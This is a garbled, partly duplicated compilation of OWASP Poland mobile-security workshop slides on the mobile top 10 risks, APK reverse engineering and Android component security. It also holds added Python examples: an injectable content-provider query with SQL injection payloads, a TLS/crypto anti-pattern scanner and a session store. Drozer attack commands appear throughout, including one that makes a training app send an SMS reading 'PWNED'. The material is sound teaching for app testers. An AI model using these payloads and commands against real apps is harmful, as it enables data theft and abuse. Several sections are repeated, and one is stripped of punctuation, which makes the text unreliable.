• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation or implementing it in an insecure way
• Few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1 etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
– Another application via intent/content provider
– Shared file
– Server response
– Third party website
Client side injection – what to inject
• SQL injection to local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running new activity etc.) via special objects called Intents:
    Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
    dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application, Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows for remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filter. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
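Added example, not from the slides or from any app they mention: an in-memory SQLite model of a password-manager content provider whose query() splices the caller's projection and selection into SQL (the pattern scanner.provider.injection probes for), next to a parameterized, allow-listed version. The table names Passwords and Key and every row are constructed.

```python
"""Content-provider query building: injectable vs. parameterized (added example)."""
import sqlite3


def make_db():
    """Constructed stand-in for the app's private SQLite database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords (service TEXT, username TEXT, password TEXT);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES ('mail', 'alice', 'constructed-secret');
        INSERT INTO Key VALUES ('thisismypassword', '9876');
    """)
    return db


def query_vulnerable(db, projection, selection=None):
    """Mirrors a ContentProvider.query() that concatenates caller input.

    Both the column list (projection) and the WHERE clause (selection)
    come from the calling app, so the caller controls the whole statement.
    """
    sql = "SELECT " + projection + " FROM Passwords"
    if selection:
        sql += " WHERE " + selection
    return db.execute(sql).fetchall()


# Columns an external caller may ask for; the password column is not one.
ALLOWED_COLUMNS = ("service", "username")


def query_hardened(db, projection, service):
    """Allow-listed projection, parameterized WHERE clause."""
    columns = [c.strip() for c in projection.split(",")]
    if not columns or any(c not in ALLOWED_COLUMNS for c in columns):
        raise ValueError("projection not allowed: %r" % projection)
    sql = "SELECT %s FROM Passwords WHERE service = ?" % ", ".join(columns)
    # '?' binds the value as data: quotes and comments cannot end the clause
    return db.execute(sql, (service,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # A projection with a trailing comment swallows the real "FROM Passwords",
    # so the statement reads from the Key table instead.
    print(query_vulnerable(db, "* FROM Key--"))
    try:
        query_hardened(db, "* FROM Key--", "mail")
    except ValueError as err:
        print("rejected:", err)
    print(query_hardened(db, "service, username", "' OR 1=1--"))
```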
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– Verify if a session expires (copy a cookie and try to use it after 30 minutes)
– Verify if a session is destroyed after the authentication state changes (e.g. switching from any logged-in user to another logged-in user)
– Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to the experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection - a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/framework puts sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious decision to store data insecurely, while unintended data leakage refers to OS/framework-specific quirks that cause data to leak
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged:
adb logcat [filterspec]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see whether any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (check what ends up in your crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or elevate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by starting exported activities directly with Drozer:
dz> run app.activity.start --component <package_name> <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the password strength policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromising the operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store the user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or using a sound one in an insecure way
• A few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Convert the APK with dex2jar and review the resulting jar in JD-GUI (or Luyten, for more readable output)
• Look for decryption keys (in attacker-readable folders or hardcoded in the binary)
• Try to break the encryption algorithm if the application uses custom ("home-made") encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA-1, etc.)
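As an added example that serves both the M3 "how to find" slide (trust-all TrustManagers, accept-all HostnameVerifiers) and the crypto checks above: a small grep-style scanner that runs over decompiled Java source (dex2jar plus JD-GUI/Luyten output). It is not mallodroid and not part of the workshop; SAMPLE_JAVA is a constructed file that contains the anti-patterns, and the rule names and weak-algorithm lists are my choices.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "line rule detail")

# Added example, not workshop code: regex checks over decompiled Java for the TLS
# and crypto anti-patterns listed on the slides. Matches source text only; a
# TrustManager that "validates" via dead code or reflection is not caught.
_RULES = [
    ("trust-all-certs",
     re.compile(r'checkServerTrusted\s*\([^)]*\)\s*(?:throws\s+[\w.,\s]+)?\{\s*\}'),
     "X509TrustManager.checkServerTrusted with an empty body accepts any certificate"),
    ("accept-all-hostnames",
     re.compile(r'ALLOW_ALL_HOSTNAME_VERIFIER|boolean\s+verify\s*\([^)]*\)\s*\{\s*return\s+true\s*;\s*\}'),
     "HostnameVerifier that returns true for every host"),
    ("webview-ignores-ssl-errors",
     re.compile(r'onReceivedSslError\s*\([^)]*\)\s*\{[^}]*\.proceed\s*\('),
     "WebViewClient.onReceivedSslError calls handler.proceed()"),
    ("weak-cipher",
     re.compile(r'Cipher\.getInstance\(\s*"([^"]*)"'),
     None),                                   # detail decided per transformation
    ("weak-hash",
     re.compile(r'MessageDigest\.getInstance\(\s*"(MD2|MD4|MD5|SHA-?1)"'),
     "MD*/SHA-1 are unsuitable for signatures, password hashing or integrity checks"),
    ("hardcoded-key",
     re.compile(r'new\s+SecretKeySpec\(\s*"[^"]+"\s*\.getBytes\('),
     "symmetric key built from a string literal; anyone with the APK has the key"),
]

def _cipher_detail(transformation):
    """Reason a Cipher transformation is weak, or None if it looks fine."""
    t = transformation.upper()
    algo = t.split("/")[0]
    if algo in ("DES", "DESEDE", "RC4", "ARCFOUR", "RC2", "BLOWFISH"):
        return "weak or legacy cipher %s" % algo
    if "/" not in t:
        return "no mode given for %s: JCE providers default to ECB" % algo
    if "/ECB/" in t + "/":
        return "ECB mode leaks plaintext structure"
    return None

def scan(java_source):
    """Return sorted Finding(line, rule, detail) entries for one decompiled source file."""
    findings = []
    for rule, pattern, detail in _RULES:
        for m in pattern.finditer(java_source):
            why = _cipher_detail(m.group(1)) if rule == "weak-cipher" else detail
            if why is None:
                continue                      # e.g. AES/GCM/NoPadding
            line = java_source.count("\n", 0, m.start()) + 1
            findings.append(Finding(line, rule, why))
    return sorted(findings)

# Constructed sample of what a decompiler typically hands back (not real app code).
SAMPLE_JAVA = '''\
public class NetHelper {
    static final TrustManager[] TRUST_ALL = new TrustManager[] { new X509TrustManager() {
        public void checkClientTrusted(X509Certificate[] chain, String authType) { }
        public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException { }
        public X509Certificate[] getAcceptedIssuers() { return null; }
    } };
    static final HostnameVerifier ANY_HOST = new HostnameVerifier() {
        public boolean verify(String hostname, SSLSession session) { return true; }
    };
    static byte[] wrap(byte[] data) throws Exception {
        Cipher c = Cipher.getInstance("AES");
        c.init(Cipher.ENCRYPT_MODE, new SecretKeySpec("s3cr3tk3y1234567".getBytes(), "AES"));
        return c.doFinal(data);
    }
    static byte[] good(byte[] data, SecretKey key) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        return c.doFinal(data);
    }
    static String digest(byte[] d) throws Exception { return hex(MessageDigest.getInstance("MD5").digest(d)); }
}
'''

if __name__ == "__main__":
    for f in scan(SAMPLE_JAVA):
        print("line %3d  %-26s %s" % f)
```

Run it over every .java file the decompiler produced and triage the hits by hand: a "trust-all-certs" finding in a class that is only wired in for debug builds is still worth a ticket, because the ProGuard rules that were supposed to strip it are exactly the kind of thing the Hannover developers got wrong.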
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password that decrypts it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption (a key derived from the user's secret at runtime) instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
– another application, via an Intent or a content provider
– a shared file
– a server response
– a third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS / WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (inter-process communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature that separates personal and professional activities)
• A crafted URI with the "smdm://" scheme allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side as well
• For internal communication use only explicit Intents
• Avoid relying on intent-filters for internal communication: even if your Activity has exported="false", another application can declare the same filter, and the system then shows a chooser dialog so the user may pick the wrong app (or the implicit Intent goes straight to the attacker's component)
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– verify whether the session expires (copy a cookie and try to use it after 30 minutes)
– verify whether the session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another)
– verify whether you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
– http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate sessions on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation sources
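What those four mitigations look like on the server side, as an added example (mine, not from the slides): a session store whose tokens are 256-bit random values from the OS CSPRNG (never a device ID), that expires sessions on both an idle and an absolute timeout, rotates the token when the authentication state changes, and can revoke every session of a user. Only a hash of each token is kept, so a leaked session table does not hand out live tokens. The clock is injectable so the timeouts can be exercised without waiting.

```python
import hashlib
import secrets
import time

# Added example, not workshop code: server-side session handling with expiry,
# rotation and revocation. Storage is an in-memory dict; a real deployment
# would back it with a shared store but keep the same rules.
class SessionStore:
    def __init__(self, idle_ttl=30 * 60, absolute_ttl=12 * 3600, now=time.time):
        self._idle_ttl = idle_ttl            # seconds of inactivity before a session dies
        self._absolute_ttl = absolute_ttl    # hard cap on session lifetime, activity or not
        self._now = now                      # injectable clock (constructed clock in the test)
        self._sessions = {}                  # sha256(token) -> {"user", "issued", "last_seen"}

    @staticmethod
    def _key(token):
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def create(self, user_id):
        """Issue a fresh high-entropy token bound to user_id."""
        token = secrets.token_urlsafe(32)    # 256 bits from the OS CSPRNG
        t = self._now()
        self._sessions[self._key(token)] = {"user": user_id, "issued": t, "last_seen": t}
        return token

    def _expired(self, s, t):
        return t - s["last_seen"] > self._idle_ttl or t - s["issued"] > self._absolute_ttl

    def lookup(self, token):
        """Return the user for a live token, or None; expired sessions are destroyed on sight."""
        key = self._key(token)
        s = self._sessions.get(key)
        if s is None:
            return None
        t = self._now()
        if self._expired(s, t):
            del self._sessions[key]
            return None
        s["last_seen"] = t
        return s["user"]

    def invalidate(self, token):
        """Logout: destroy the session server-side, not just the client's copy."""
        self._sessions.pop(self._key(token), None)

    def invalidate_user(self, user_id):
        """Password change or compromise: kill every session of the user; returns how many."""
        doomed = [k for k, s in self._sessions.items() if s["user"] == user_id]
        for k in doomed:
            del self._sessions[k]
        return len(doomed)

    def rotate(self, token):
        """Swap the token after an authentication-state change (login, step-up, user switch)."""
        user = self.lookup(token)
        if user is None:
            return None
        self.invalidate(token)
        return self.create(user)

    def sweep(self):
        """Periodic cleanup; lookup() only evicts the sessions it happens to touch."""
        t = self._now()
        dead = [k for k, s in self._sessions.items() if self._expired(s, t)]
        for k in dead:
            del self._sessions[k]
        return len(dead)

    def live_count(self):
        return len(self._sessions)
```

The idle timeout is the one to tune to the 71-second figure above; the absolute timeout is what limits a stolen token regardless of how often the attacker keeps it warm.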
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB
• Using APKpure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly-like code (Smali)
• Why disassemble rather than decompile?
Decompiling
DEX → JAR → Java
Decompiling - Dex2Jar
• dex2jar
– converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– lets you use any existing Java decompiler on the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Java decompiler GUIs (Luyten is a front-end for the Procyon decompiler)
– combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but produce different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → Smali
Disassembling
• Apktool
– open-source Java tool for reverse engineering Android apps
– transforms binary Dalvik bytecode (dex) into Smali source, and rebuilds the APK after edits
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Application Framework
• Activity Manager – manages the activity life cycle of applications
• Content Providers – manage data sharing between applications
• Telephony Manager – manages all voice calls
• Location Manager – location management using GPS or cell towers
• Resource Manager – manages the various types of resources we use in our application
Application Layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK – how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install-time security decisions
• Android 6.0 security release
Android 6.0
• Runtime permissions
• Verified Boot
• Hardware-isolated security
• Fingerprints
• SD card adoption
• Clear-text traffic
• System hardening
• USB access control
Defense layers
(figure: five layers, starting with Google Play – require and validate developer information; review applications before distribution; permanently stop distribution; reduce attacker flexibility; remove applications after installation)
Apps from Unknown Sources
• By default only Google Play and other pre-installed app stores are allowed to install apps
• The vast majority of installs come from Google Play
Verify Apps
• Apps are verified prior to install
• Warns about or blocks Potentially Harmful Applications
• Over 10 million installs verified every day
• Verification is on and visible when needed
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
– Isolation
– Privilege separation
• How sensitive data is transmitted
– Extra-device communication
– Inter-application communication
– Inter-component communication
Android Application Components
(figure: Activities, Services, Content providers, Broadcast receivers)
Android Application Components
AndroidManifest.xml defines how the app works and what kind of interaction between its components and the outside world is possible. Permissions are declared there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions:
<uses-permission android:name="string" />
<permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Attributes worth checking:
• debuggable (on <application>)
• enabled
• exported
• permission
Example component attributes
(figure: Activities, Services, Content providers, Broadcast receivers)
Intents
An Intent is a messaging object created and delivered to an intended application component. It carries all relevant information: the calling application, the desired target component and the requested action/data.
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse("http://www.google.com"));
String pack = "com.android.browser";
ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
intent.setComponent(comp);   // explicit Intent: the target component is named
startActivity(intent);
Drozer
